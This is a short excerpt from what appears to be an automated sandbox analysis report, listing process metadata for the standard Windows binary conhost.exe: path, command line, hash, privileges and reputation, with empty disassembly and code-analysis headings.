                                              Reputation:high

                                              Analysis Process: conhost.exe PID: 808 Parent PID: 7080

                                              General

                                              Start time:17:48:59
                                              Start date:25/11/2021
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff724c50000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Disassembly

                                              Code Analysis

                                              Reset < >